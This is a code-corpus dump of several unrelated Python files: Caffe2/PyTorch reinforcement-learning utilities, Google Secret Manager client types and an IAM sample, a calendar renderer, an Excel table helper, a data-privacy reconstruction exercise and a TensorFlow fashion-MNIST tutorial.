{
"source": "johncliu/Horizon",
"score": 2
} |
#### File: ml/rl/caffe_utils.py
```python
import itertools
import logging
import os
import traceback
from io import BytesIO
from typing import Any, Dict, List, Optional
import caffe2.python.onnx.backend
import numpy as np
import onnx
import torch
from caffe2.python import core, workspace
from caffe2.python.core import BlobReference
logger = logging.getLogger(__name__)
class C2Meta(type):
def __getattr__(cls, method_name):
def method(*inputs, **kwargs):
tb = traceback.extract_stack(limit=2)
blob_prefix = "{}:{}:{}".format(
os.path.basename(tb[0].filename), tb[0].lineno, method_name
)
OpSchema = workspace.C.OpSchema
schema = OpSchema.get(method_name)
num_outputs = schema.CalculateOutput(len(inputs))
outputs = []
if num_outputs < 0:
num_outputs = schema.max_output
for x in range(num_outputs):
outputs.append(C2._net.NextBlob(blob_prefix + "_output" + str(x)))
promoted_inputs = []
for i in inputs:
if type(i) != str and type(i) != BlobReference:
# Promote input by stuffing into a blob
                    input_name = C2._net.NextBlob(
                        blob_prefix + "_input" + str(len(promoted_inputs))
                    )
if type(i) == np.ndarray:
workspace.FeedBlob(input_name, i)
else:
workspace.FeedBlob(input_name, np.array([i], dtype=np.float32))
promoted_inputs.append(input_name)
else:
promoted_inputs.append(i)
return C2._net.__getattr__(method_name)(promoted_inputs, outputs, **kwargs)
return method
class C2(metaclass=C2Meta):
_net: Optional[Any] = None
_init_net: Optional[Any] = None
_model: Optional[Any] = None
@staticmethod
def set_net(net):
C2._model = None
C2._net = net
C2._init_net = None
@staticmethod
def set_net_and_init_net(net, init_net):
C2._model = None
C2._net = net
C2._init_net = init_net
@staticmethod
def net():
return C2._net
@staticmethod
def init_net():
return C2._init_net
@staticmethod
def set_model(model):
C2._model = model
C2._init_net = None
if model is None:
C2._net = None
else:
C2._net = model.net
@staticmethod
def model():
return C2._model
@staticmethod
def NextBlob(prefix: str) -> str:
assert C2._net is not None
tb = traceback.extract_stack(limit=2)
prefix = "{}:{}:{}:{}".format(
C2._net.Name(), os.path.basename(tb[0].filename), tb[0].lineno, prefix
)
return C2._net.NextBlob(prefix)
class StackedArray(object):
def __init__(self, lengths, values):
self.lengths = lengths
self.values = values
@classmethod
def from_list_list(cls, d: List[List[float]], blob_prefix: str):
lengths_blob = blob_prefix + "_lengths"
values_blob = blob_prefix + "_values"
workspace.FeedBlob(lengths_blob, np.array([len(x) for x in d], dtype=np.int32))
workspace.FeedBlob(
values_blob, np.array(list(itertools.chain(*d)), dtype=np.float32)
)
return cls(lengths_blob, values_blob)
class StackedAssociativeArray(object):
def __init__(self, lengths, keys, values):
self.lengths = lengths
self.keys = keys
self.values = values
def to_python(self) -> List[Dict[Any, Any]]:
keys = workspace.FetchBlob(self.keys)
lengths = workspace.FetchBlob(self.lengths)
values = workspace.FetchBlob(self.values)
retval: List[Dict[Any, Any]] = []
cursor = 0
for length in lengths:
d = {}
for _ in range(length):
key = keys[cursor]
value = values[cursor]
d[key] = value
cursor += 1
retval.append(d)
return retval
@classmethod
def from_dict_list(cls, d: List[Dict[int, float]], blob_prefix: str):
lengths_blob = blob_prefix + "_lengths"
keys_blob = blob_prefix + "_keys"
values_blob = blob_prefix + "_values"
workspace.FeedBlob(lengths_blob, np.array([len(x) for x in d], dtype=np.int32))
key_list_2d = [list(x.keys()) for x in d]
workspace.FeedBlob(
keys_blob, np.array(list(itertools.chain(*key_list_2d)), dtype=np.int32)
)
value_list_2d = [list(x.values()) for x in d]
workspace.FeedBlob(
values_blob,
np.array(list(itertools.chain(*value_list_2d)), dtype=np.float32),
)
return cls(lengths_blob, keys_blob, values_blob)
class StackedTwoLevelAssociativeArray(object):
def __init__(
self,
outer_lengths: str,
outer_keys: str,
inner_lengths: str,
inner_keys: str,
inner_values: str,
) -> None:
self.outer_lengths = outer_lengths
self.outer_keys = outer_keys
self.inner_lengths = inner_lengths
self.inner_keys = inner_keys
self.inner_values = inner_values
def to_python(self) -> List[Dict[Any, Dict[Any, Any]]]:
outer_keys = workspace.FetchBlob(self.outer_keys)
outer_lengths = workspace.FetchBlob(self.outer_lengths)
inner_keys = workspace.FetchBlob(self.inner_keys)
inner_lengths = workspace.FetchBlob(self.inner_lengths)
inner_values = workspace.FetchBlob(self.inner_values)
retval: List[Dict[Any, Dict[Any, Any]]] = []
outer_cursor = 0
inner_cursor = 0
for length in outer_lengths:
outer_dict = {}
for _ in range(length):
outer_key = outer_keys[outer_cursor]
inner_length = inner_lengths[outer_cursor]
outer_cursor += 1
inner_dict = {}
for _ in range(inner_length):
inner_key = inner_keys[inner_cursor]
inner_value = inner_values[inner_cursor]
inner_cursor += 1
inner_dict[inner_key] = inner_value
outer_dict[outer_key] = inner_dict
retval.append(outer_dict)
return retval
class PytorchCaffe2Converter(object):
@staticmethod
def pytorch_net_to_caffe2_netdef(*args, **kwargs):
buffer = PytorchCaffe2Converter.pytorch_net_to_buffer(*args, **kwargs)
return PytorchCaffe2Converter.buffer_to_caffe2_netdef(buffer)
@staticmethod
def pytorch_net_to_buffer(pytorch_net, input_dim, model_on_gpu, float_input=True):
"""Traces a pytorch net and outputs a python buffer object
holding net."""
training = pytorch_net.training
pytorch_net.train(False)
for name, p in pytorch_net.named_parameters():
inf_count = torch.isinf(p).sum().item()
nan_count = torch.isnan(p).sum().item()
assert inf_count + nan_count == 0, "{} has {} inf and {} nan".format(
name, inf_count, nan_count
)
if float_input:
dtype = torch.cuda.FloatTensor if model_on_gpu else torch.FloatTensor
dummy_input = torch.randn(1, input_dim).type(dtype)
else:
dtype = torch.cuda.LongTensor if model_on_gpu else torch.LongTensor
dummy_input = torch.randint(low=0, high=1, size=(1, input_dim)).type(dtype)
write_buffer = BytesIO()
try:
torch.onnx.export(pytorch_net, dummy_input, write_buffer)
finally:
pytorch_net.train(training)
return write_buffer
@staticmethod
def buffer_to_caffe2_netdef(buffer):
"""Creates caffe2 NetDef from buffer object and returns pointer to
input and output blobs and the NetDef."""
protobuf_model = onnx.load(BytesIO(buffer.getvalue()))
input_blob_name = protobuf_model.graph.input[0].name
output_blob_name = protobuf_model.graph.output[0].name
logger.info(
"INPUT BLOB: " + input_blob_name + ". OUTPUT BLOB:" + output_blob_name
)
return (
input_blob_name,
output_blob_name,
caffe2.python.onnx.backend.prepare(protobuf_model),
)
@staticmethod
def remap_blobs(input_blob, output_blob, netdef, prefix):
init_net = core.Net(netdef.init_net)
predict_net = core.Net(netdef.predict_net)
blob_remap = {
str(b): "{}/{}".format(prefix, str(b))
for n in [init_net, predict_net]
for b in n.external_inputs + n.external_outputs
}
remapped_input_blob = blob_remap[input_blob]
remapped_output_blob = blob_remap[output_blob]
remapped_init_net, _blob_remap = core.clone_and_bind_net(
init_net, "{}_init".format(prefix), "{}_init/".format(prefix), blob_remap
)
remapped_predict_net, predict_blob_remap = core.clone_and_bind_net(
predict_net,
"{}_predict".format(prefix),
"{}_predict/".format(prefix),
blob_remap,
)
torch_workspace = netdef.workspace
parameters = torch_workspace.Blobs()
for blob_str in parameters:
workspace.FeedBlob(
blob_remap[blob_str], torch_workspace.FetchBlob(blob_str)
)
remapped_parameters = [predict_blob_remap[b] for b in parameters]
return (
remapped_input_blob,
remapped_output_blob,
remapped_parameters,
remapped_init_net,
remapped_predict_net,
)
```
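The `C2` helper above resolves arbitrary Caffe2 operator names at call time: `C2Meta.__getattr__` looks up the operator schema, auto-names the output blobs, promotes raw numpy inputs into blobs, and appends the op to the active net. A minimal usage sketch, assuming the module above is importable as `ml.rl.caffe_utils` (net and input values are illustrative):
```python
import numpy as np
from caffe2.python import core, workspace

from ml.rl.caffe_utils import C2  # the helper defined above

# Register a net so C2 knows where to append operators.
net = core.Net("example_net")
C2.set_net(net)

# C2.Relu is resolved dynamically by C2Meta.__getattr__: the numpy input is
# fed into an auto-named blob and a Relu op is added to `example_net`.
relu_output = C2.Relu(np.array([-1.0, 0.5, 2.0], dtype=np.float32))

workspace.RunNetOnce(net)
print(workspace.FetchBlob(relu_output))  # expected: [0.0, 0.5, 2.0]
```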
#### File: rl/training/dqn_trainer_base.py
```python
import logging
import torch
from ml.rl.training.rl_trainer_pytorch import RLTrainer
logger = logging.getLogger(__name__)
class DQNTrainerBase(RLTrainer):
def get_max_q_values(self, q_values, q_values_target, possible_actions_mask):
"""
Used in Q-learning update.
:param states: Numpy array with shape (batch_size, state_dim). Each row
contains a representation of a state.
:param possible_actions_mask: Numpy array with shape (batch_size, action_dim).
possible_actions[i][j] = 1 iff the agent can take action j from
state i.
:param double_q_learning: bool to use double q-learning
"""
# The parametric DQN can create flattened q values so we reshape here.
q_values = q_values.reshape(possible_actions_mask.shape)
q_values_target = q_values_target.reshape(possible_actions_mask.shape)
if self.double_q_learning:
# Set q-values of impossible actions to a very large negative number.
inverse_pna = 1 - possible_actions_mask
impossible_action_penalty = self.ACTION_NOT_POSSIBLE_VAL * inverse_pna
q_values = q_values + impossible_action_penalty
# Select max_q action after scoring with online network
max_q_values, max_indicies = torch.max(q_values, dim=1, keepdim=True)
# Use q_values from target network for max_q action from online q_network
            # to decouple selection & scoring, preventing overestimation of q-values
q_values = torch.gather(q_values_target, 1, max_indicies)
return q_values, max_indicies
else:
# Set q-values of impossible actions to a very large negative number.
inverse_pna = 1 - possible_actions_mask
impossible_action_penalty = self.ACTION_NOT_POSSIBLE_VAL * inverse_pna
q_values = q_values + impossible_action_penalty
max_q_values, max_indicies = torch.max(q_values, dim=1, keepdim=True)
return max_q_values, max_indicies
``` |
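The double Q-learning branch above selects the greedy action with the online network but scores it with the target network. A small, self-contained sketch of that step (tensor values and the `ACTION_NOT_POSSIBLE_VAL` constant are illustrative, not taken from the trainer):
```python
import torch

# Actions are *selected* with the online network's q_values, but *evaluated*
# with the target network's q_values_target.
q_values = torch.tensor([[1.0, 5.0, 3.0],
                         [2.0, 0.5, 4.0]])          # online network
q_values_target = torch.tensor([[1.1, 4.0, 2.9],
                                [1.8, 0.4, 3.7]])   # target network
possible_actions_mask = torch.tensor([[1.0, 1.0, 1.0],
                                      [1.0, 0.0, 1.0]])

ACTION_NOT_POSSIBLE_VAL = -1e9  # illustrative "very large negative number"
penalty = ACTION_NOT_POSSIBLE_VAL * (1 - possible_actions_mask)

# Select argmax actions with the online network (impossible actions masked out)
_, max_indices = torch.max(q_values + penalty, dim=1, keepdim=True)
# Evaluate the selected actions with the target network
double_q = torch.gather(q_values_target, 1, max_indices)
print(max_indices.squeeze().tolist())  # [1, 2]
print(double_q.squeeze().tolist())     # [4.0, 3.7]
```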
{
"source": "johnclyde/python-secret-manager",
"score": 2
} |
#### File: secretmanager_v1beta1/types/service.py
```python
import proto # type: ignore
from google.cloud.secretmanager_v1beta1.types import resources
from google.protobuf import field_mask_pb2 as field_mask # type: ignore
__protobuf__ = proto.module(
package="google.cloud.secrets.v1beta1",
manifest={
"ListSecretsRequest",
"ListSecretsResponse",
"CreateSecretRequest",
"AddSecretVersionRequest",
"GetSecretRequest",
"ListSecretVersionsRequest",
"ListSecretVersionsResponse",
"GetSecretVersionRequest",
"UpdateSecretRequest",
"AccessSecretVersionRequest",
"AccessSecretVersionResponse",
"DeleteSecretRequest",
"DisableSecretVersionRequest",
"EnableSecretVersionRequest",
"DestroySecretVersionRequest",
},
)
class ListSecretsRequest(proto.Message):
r"""Request message for
[SecretManagerService.ListSecrets][google.cloud.secrets.v1beta1.SecretManagerService.ListSecrets].
Attributes:
parent (str):
Required. The resource name of the project associated with
the [Secrets][google.cloud.secrets.v1beta1.Secret], in the
format ``projects/*``.
page_size (int):
Optional. The maximum number of results to be
returned in a single page. If set to 0, the
server decides the number of results to return.
If the number is greater than 25000, it is
capped at 25000.
page_token (str):
Optional. Pagination token, returned earlier via
[ListSecretsResponse.next_page_token][google.cloud.secrets.v1beta1.ListSecretsResponse.next_page_token].
"""
parent = proto.Field(proto.STRING, number=1)
page_size = proto.Field(proto.INT32, number=2)
page_token = proto.Field(proto.STRING, number=3)
class ListSecretsResponse(proto.Message):
r"""Response message for
[SecretManagerService.ListSecrets][google.cloud.secrets.v1beta1.SecretManagerService.ListSecrets].
Attributes:
secrets (Sequence[google.cloud.secretmanager_v1beta1.types.Secret]):
The list of [Secrets][google.cloud.secrets.v1beta1.Secret]
sorted in reverse by create_time (newest first).
next_page_token (str):
A token to retrieve the next page of results. Pass this
value in
[ListSecretsRequest.page_token][google.cloud.secrets.v1beta1.ListSecretsRequest.page_token]
to retrieve the next page.
total_size (int):
The total number of
[Secrets][google.cloud.secrets.v1beta1.Secret].
"""
@property
def raw_page(self):
return self
secrets = proto.RepeatedField(proto.MESSAGE, number=1, message=resources.Secret,)
next_page_token = proto.Field(proto.STRING, number=2)
total_size = proto.Field(proto.INT32, number=3)
class CreateSecretRequest(proto.Message):
r"""Request message for
[SecretManagerService.CreateSecret][google.cloud.secrets.v1beta1.SecretManagerService.CreateSecret].
Attributes:
parent (str):
Required. The resource name of the project to associate with
the [Secret][google.cloud.secrets.v1beta1.Secret], in the
format ``projects/*``.
secret_id (str):
Required. This must be unique within the project.
A secret ID is a string with a maximum length of 255
characters and can contain uppercase and lowercase letters,
numerals, and the hyphen (``-``) and underscore (``_``)
characters.
secret (google.cloud.secretmanager_v1beta1.types.Secret):
Required. A [Secret][google.cloud.secrets.v1beta1.Secret]
with initial field values.
"""
parent = proto.Field(proto.STRING, number=1)
secret_id = proto.Field(proto.STRING, number=2)
secret = proto.Field(proto.MESSAGE, number=3, message=resources.Secret,)
class AddSecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.AddSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.AddSecretVersion].
Attributes:
parent (str):
Required. The resource name of the
[Secret][google.cloud.secrets.v1beta1.Secret] to associate
with the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
in the format ``projects/*/secrets/*``.
payload (google.cloud.secretmanager_v1beta1.types.SecretPayload):
Required. The secret payload of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion].
"""
parent = proto.Field(proto.STRING, number=1)
payload = proto.Field(proto.MESSAGE, number=2, message=resources.SecretPayload,)
class GetSecretRequest(proto.Message):
r"""Request message for
[SecretManagerService.GetSecret][google.cloud.secrets.v1beta1.SecretManagerService.GetSecret].
Attributes:
name (str):
Required. The resource name of the
[Secret][google.cloud.secrets.v1beta1.Secret], in the format
``projects/*/secrets/*``.
"""
name = proto.Field(proto.STRING, number=1)
class ListSecretVersionsRequest(proto.Message):
r"""Request message for
[SecretManagerService.ListSecretVersions][google.cloud.secrets.v1beta1.SecretManagerService.ListSecretVersions].
Attributes:
parent (str):
Required. The resource name of the
[Secret][google.cloud.secrets.v1beta1.Secret] associated
with the
[SecretVersions][google.cloud.secrets.v1beta1.SecretVersion]
to list, in the format ``projects/*/secrets/*``.
page_size (int):
Optional. The maximum number of results to be
returned in a single page. If set to 0, the
server decides the number of results to return.
If the number is greater than 25000, it is
capped at 25000.
page_token (str):
Optional. Pagination token, returned earlier via
                [ListSecretVersionsResponse.next_page_token][].
"""
parent = proto.Field(proto.STRING, number=1)
page_size = proto.Field(proto.INT32, number=2)
page_token = proto.Field(proto.STRING, number=3)
class ListSecretVersionsResponse(proto.Message):
r"""Response message for
[SecretManagerService.ListSecretVersions][google.cloud.secrets.v1beta1.SecretManagerService.ListSecretVersions].
Attributes:
versions (Sequence[google.cloud.secretmanager_v1beta1.types.SecretVersion]):
The list of
[SecretVersions][google.cloud.secrets.v1beta1.SecretVersion]
sorted in reverse by create_time (newest first).
next_page_token (str):
A token to retrieve the next page of results. Pass this
value in
[ListSecretVersionsRequest.page_token][google.cloud.secrets.v1beta1.ListSecretVersionsRequest.page_token]
to retrieve the next page.
total_size (int):
The total number of
[SecretVersions][google.cloud.secrets.v1beta1.SecretVersion].
"""
@property
def raw_page(self):
return self
versions = proto.RepeatedField(
proto.MESSAGE, number=1, message=resources.SecretVersion,
)
next_page_token = proto.Field(proto.STRING, number=2)
total_size = proto.Field(proto.INT32, number=3)
class GetSecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.GetSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.GetSecretVersion].
Attributes:
name (str):
Required. The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
in the format ``projects/*/secrets/*/versions/*``.
``projects/*/secrets/*/versions/latest`` is an alias to the
``latest``
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion].
"""
name = proto.Field(proto.STRING, number=1)
class UpdateSecretRequest(proto.Message):
r"""Request message for
[SecretManagerService.UpdateSecret][google.cloud.secrets.v1beta1.SecretManagerService.UpdateSecret].
Attributes:
secret (google.cloud.secretmanager_v1beta1.types.Secret):
Required. [Secret][google.cloud.secrets.v1beta1.Secret] with
updated field values.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. Specifies the fields to be updated.
"""
secret = proto.Field(proto.MESSAGE, number=1, message=resources.Secret,)
update_mask = proto.Field(proto.MESSAGE, number=2, message=field_mask.FieldMask,)
class AccessSecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.AccessSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion].
Attributes:
name (str):
Required. The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
in the format ``projects/*/secrets/*/versions/*``.
"""
name = proto.Field(proto.STRING, number=1)
class AccessSecretVersionResponse(proto.Message):
r"""Response message for
[SecretManagerService.AccessSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion].
Attributes:
name (str):
The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
in the format ``projects/*/secrets/*/versions/*``.
payload (google.cloud.secretmanager_v1beta1.types.SecretPayload):
Secret payload
"""
name = proto.Field(proto.STRING, number=1)
payload = proto.Field(proto.MESSAGE, number=2, message=resources.SecretPayload,)
class DeleteSecretRequest(proto.Message):
r"""Request message for
[SecretManagerService.DeleteSecret][google.cloud.secrets.v1beta1.SecretManagerService.DeleteSecret].
Attributes:
name (str):
Required. The resource name of the
[Secret][google.cloud.secrets.v1beta1.Secret] to delete in
the format ``projects/*/secrets/*``.
"""
name = proto.Field(proto.STRING, number=1)
class DisableSecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.DisableSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.DisableSecretVersion].
Attributes:
name (str):
Required. The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
to disable in the format
``projects/*/secrets/*/versions/*``.
"""
name = proto.Field(proto.STRING, number=1)
class EnableSecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.EnableSecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.EnableSecretVersion].
Attributes:
name (str):
Required. The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
to enable in the format ``projects/*/secrets/*/versions/*``.
"""
name = proto.Field(proto.STRING, number=1)
class DestroySecretVersionRequest(proto.Message):
r"""Request message for
[SecretManagerService.DestroySecretVersion][google.cloud.secrets.v1beta1.SecretManagerService.DestroySecretVersion].
Attributes:
name (str):
Required. The resource name of the
[SecretVersion][google.cloud.secrets.v1beta1.SecretVersion]
to destroy in the format
``projects/*/secrets/*/versions/*``.
"""
name = proto.Field(proto.STRING, number=1)
__all__ = tuple(sorted(__protobuf__.manifest))
```
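The paging fields above (`page_size`, `page_token`, `next_page_token`) are normally consumed through the generated client rather than by hand. A hedged sketch, assuming this package's `SecretManagerServiceClient` and an illustrative project id; the returned pager follows `next_page_token` automatically:
```python
from google.cloud import secretmanager_v1beta1

client = secretmanager_v1beta1.SecretManagerServiceClient()
parent = "projects/my-project"  # format described by ListSecretsRequest.parent

# ListSecretsRequest fields map onto the request dict; iterating the pager
# issues follow-up requests using next_page_token behind the scenes.
for secret in client.list_secrets(request={"parent": parent, "page_size": 100}):
    print(secret.name)
```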
#### File: samples/snippets/iam_grant_access.py
```python
import argparse
# [START secretmanager_iam_grant_access]
def iam_grant_access(project_id, secret_id, member):
"""
Grant the given member access to a secret.
"""
# Import the Secret Manager client library.
from google.cloud import secretmanager
# Create the Secret Manager client.
client = secretmanager.SecretManagerServiceClient()
# Build the resource name of the secret.
name = client.secret_path(project_id, secret_id)
# Get the current IAM policy.
policy = client.get_iam_policy(request={"resource": name})
# Add the given member with access permissions.
policy.bindings.add(role="roles/secretmanager.secretAccessor", members=[member])
# Update the IAM Policy.
new_policy = client.set_iam_policy(request={"resource": name, "policy": policy})
# Print data about the secret.
print("Updated IAM policy on {}".format(secret_id))
# [END secretmanager_iam_grant_access]
return new_policy
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("project_id", help="id of the GCP project")
parser.add_argument("secret_id", help="id of the secret to get")
parser.add_argument("member", help="member to grant access")
args = parser.parse_args()
iam_grant_access(args.project_id, args.secret_id, args.member)
``` |
{
"source": "johnclyde/rubik",
"score": 3
} |
#### File: rubik/calendar/dumb_renderer.py
```python
class DumbRenderer(object):
names_of_days = [
"Monday",
"Tuesday",
"Wednesday",
"Thursday",
"Friday",
"Saturday",
"Sunday",
]
def render_week(self, week):
print()
print('time for another week')
for d in week:
dow = d.weekday()
dow_name = self.names_of_days[dow]
print("date is {date}".format(date=d))
print("Day of week is {dow}.".format(dow=dow_name))
``` |
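`render_week` only assumes each element exposes `weekday()` in Python's Monday-first convention, so `datetime.date` objects work directly. An illustrative call (dates are made up):
```python
from datetime import date, timedelta

start = date(2021, 3, 1)  # a Monday, so weekday() == 0 maps to "Monday"
week = [start + timedelta(days=i) for i in range(7)]
DumbRenderer().render_week(week)
```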
{
"source": "johncmacy/xlsxwriter-tables",
"score": 3
} |
#### File: xlsxwriter-tables/xlsxwriter_tables/xlsxwriter_tables.py
```python
from typing import Union
class ExcelTable:
def _get_column(self, column_name:str, column_props:Union[dict, str]) -> dict:
'''
Defaults to the title-cased `column_name`:
my_favorite_color: 'My Favorite Color'
For acronyms, abbreviations, provide the correct capitalization in the `column_name`:
NFL_franchise_name: 'NFL Franchise Name'
'''
column = {'header': column_name.replace('_', ' ').title()}
'''
If other attributes were provided, such as `formula`, or `format`, pass them along.
'''
if isinstance(column_props, dict):
column.update(**column_props)
return column
def _get_data(self, item, column_name:str, column_props:Union[None, dict, str, tuple], separator, raise_attribute_errors):
'''
Set the default value to `column_name`:
columns = {
'date_is_tuesday': ...
}
'''
data_accessor = column_name
'''
For each column key, its value `column_props` could be None, or a string, tuple, function, or dictionary:
columns = {
'column_with_none': None,
'column_with_string': 'deeply.nested.property',
'column_with_tuple': ('deeply', 'nested', 'property'),
'column_with_function': lambda item: ...,
'column_with_dict': {
'data_accessor': ...,
},
}
If `column_props` is a dictionary, it may have a `data_accessor` key.
If it does, `data_accessor` could be a string, tuple, or function.
If not, continue to use the `column_name` as the `data_accessor`.
'''
if column_props:
'''
If `column_props` is a dict, look for a `data_accessor` property.
columns = {
'date_is_tuesday': {
'data_accessor': ...
}
}
`data_accessor` could be a function, str, or tuple.
'''
if isinstance(column_props, dict):
if 'data_accessor' in column_props.keys():
data_accessor = column_props['data_accessor']
else:
'''
If `column_props` is a dict, but it doesn't have a
`data_accessor` key, then use the `column_name` as
a string as the `data_accessor`.
'''
pass
else:
'''
If not a dict, it's either a string, tuple, or function.
'''
data_accessor = column_props
'''
If `data_accessor` is a function, call the function and
return the resulting value.
Note: The function should expect a single kwarg, `item`.
Example:
def day_of_week_is_tuesday(item):
return item.start_date.weekday() == 1
columns = {
'date_is_tuesday': {
'data_accessor': day_of_week_is_tuesday,
}
}
Or, as an inline (lambda) function:
columns = {
'date_is_tuesday': {
'data_accessor': lambda item: item.start_date.weekday() == 1
}
}
'''
if callable(data_accessor):
return data_accessor(item)
'''
If we've made it this far, it's either a tuple or a string.
If it's a string, split it using the separator, and convert to a tuple.
For the following examples, assume each item has a data structure like so:
{
'alpha': {
'bravo': {
'charlie': 123,
}
}
}
The default attribute separator is dot ('.'):
alpha.bravo.charlie'
Custom separators can be used. For instance, to resemble Django's ORM, set the separator to '__':
'alpha__bravo__charlie'
'''
if isinstance(data_accessor, str):
data_accessor = tuple(data_accessor.split(separator))
'''
By now, we should have a tuple, which is a list
of nested attributes that point to where the data is.
This code recursively traverses through the tuple of
nested attributes and returns the value that is deeply
nested inside the data structure.
'''
if isinstance(data_accessor, tuple):
# need to deepcopy here?
nested_data = item
for key in data_accessor:
try:
if isinstance(nested_data, dict):
nested_data = nested_data[key]
else:
nested_data = getattr(nested_data, key)
if callable(nested_data):
nested_data = nested_data()
except (KeyError, AttributeError) as e:
if raise_attribute_errors:
return f'{type(e)}: {str(e)}'
else:
return None
except Exception as e:
'''
If an exception other than (KeyError, AttributeError) is encountered, the error message
is returned and displayed in the cell to aid in troubleshooting.
'''
return f'{type(e)}: {str(e)}'
return nested_data
'''
If we reach this point, we don't know how to access data from the item, so raise an error.
'''
raise ValueError(f'''
Unable to detect the `data_accessor`. Please provide a function, string, or tuple.
- column_name={column_name}
- column_props={column_props}
''')
def __init__(self, columns:dict, data:list, separator='.', include_total_row=True, raise_attribute_errors=False):
columns_dict = {
name: self._get_column(name, props)
for name, props
in columns.items()
}
columns_and_headers = {
key: f'[@[{value["header"]}]]'
for key, value
in columns_dict.items()
}
for column in columns_dict.values():
if 'formula' in column.keys():
formula_str:str = column['formula']
column['formula'] = formula_str.format(**columns_and_headers)
self.columns:list[dict] = tuple(columns_dict.values())
self.data:list = [
[
self._get_data(item, column_name, column_props, separator, raise_attribute_errors)
for column_name, column_props
in columns.items()
]
for item
in data
]
self.top_left = (0,0)
self.bottom_right = (
len(self.data) - 1 + 1 + (1 if include_total_row else 0),
len(self.columns) - 1
)
self.coordinates = (*self.top_left, *self.bottom_right)
self.include_total_row = include_total_row
``` |
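Putting the pieces above together, a column definition can be `None` (look up by column name), a dotted path into nested data, or a callable. A minimal sketch with made-up data showing how `ExcelTable` resolves each kind:
```python
# Illustrative data and column names, assuming ExcelTable from the module above.
people = [
    {"first_name": "Ada", "address": {"city": {"name": "London"}}, "age": 36},
    {"first_name": "Alan", "address": {"city": {"name": "Wilmslow"}}, "age": 41},
]

columns = {
    "first_name": None,                          # value looked up by column name
    "city": "address.city.name",                 # dotted path through nested dicts
    "is_adult": lambda item: item["age"] >= 18,  # computed per item
}

table = ExcelTable(columns=columns, data=people)
print(table.columns)  # headers: 'First Name', 'City', 'Is Adult'
print(table.data)     # [['Ada', 'London', True], ['Alan', 'Wilmslow', True]]
```
The resulting `table.columns` and `table.data` are shaped to drop into xlsxwriter's `worksheet.add_table(..., {"columns": ..., "data": ...})` options.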
{
"source": "johncmerfeld/BUCS_dataPrivacy",
"score": 3
} |
#### File: johncmerfeld/BUCS_dataPrivacy/attackUtils.py
```python
import numpy as np
import random as rand
# given a length n,
# return a random binary vector
def secretVector(n):
x = np.zeros(n, dtype = int)
    for i in range(0, len(x)):
r = rand.uniform(0, 1)
if r < 0.5:
x[i] = 0
else:
x[i] = 1
return x
# given a matrix A, a vector x, and a noise parameter sigma,
# return (1/n) * Ax + e, where each entry of e is drawn from a normal
# distribution with standard deviation sigma^2
def privacyMechanism(A, x, sigma):
n = len(x)
# set up noise vector
e = np.zeros(len(A), dtype = float)
for i in range(0, len(e)):
e[i] = np.random.normal(0, sigma ** 2)
return ((1/n) * A.dot(x)) + e
def normalizedHammingDistance(v1, v2):
# sanity check
assert len(v1) == len(v2)
# initialize output
distance = 0
for i in range(0, len(v1)):
if v1[i] != v2[i]:
distance += 1
return (len(v1) - distance) / len(v1)
```
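One hedged way to exercise these helpers end to end (the query count, sigma, and the least-squares recovery step below are illustrative choices, not part of the original file): draw a secret, answer random subset-sum queries through `privacyMechanism`, then estimate the secret and measure how many bits match.
```python
import numpy as np

# Assumes secretVector, privacyMechanism, and normalizedHammingDistance
# from the module above are in scope.
n = 64          # secret length
m = 4 * n       # number of queries
sigma = 0.01    # noise parameter passed to privacyMechanism

x = secretVector(n)
A = np.random.randint(0, 2, size=(m, n))          # random 0/1 query matrix
answers = privacyMechanism(A, x, sigma)           # (1/n) * A @ x + noise

# Least-squares estimate of x from the noisy answers, rounded to {0, 1}
x_hat, *_ = np.linalg.lstsq(A / n, answers, rcond=None)
x_hat = np.clip(np.rint(x_hat), 0, 1).astype(int)

print(normalizedHammingDistance(x, x_hat))        # fraction of matching bits
```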
#### File: johncmerfeld/BUCS_dataPrivacy/tensorflowPractice.py
```python
import tensorflow as tf
from tensorflow import keras
# Helper libraries
import numpy as np
import cv2
import matplotlib.pyplot as plt
# possible warning suppressing stuff
#print(tf.__version__)
#import os
#os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# define dataset
fashion_mnist = keras.datasets.fashion_mnist
(train_images, train_labels), (test_images, test_labels) = fashion_mnist.load_data()
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
# example 1
plt.figure()
plt.imshow(train_images[100])
plt.colorbar()
plt.grid(False)
# put scores in [0,1]
train_images = train_images / 255.0
test_images = test_images / 255.0
# example 2
plt.figure(figsize=(10,10))
for i in range(25):
plt.subplot(5,5,i+1)
plt.xticks([])
plt.yticks([])
plt.grid(False)
plt.imshow(train_images[i], cmap=plt.cm.binary)
plt.xlabel(class_names[train_labels[i]])
# set up layers
model = keras.Sequential([
keras.layers.Flatten(input_shape=(28, 28)),
keras.layers.Dense(128, activation=tf.nn.relu),
keras.layers.Dense(10, activation=tf.nn.softmax)
])
model.compile(optimizer=tf.train.AdamOptimizer(),
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(train_images, train_labels, epochs = 3)
test_loss, test_acc = model.evaluate(test_images, test_labels)
print('Test accuracy:', test_acc)
predictions = model.predict(test_images)
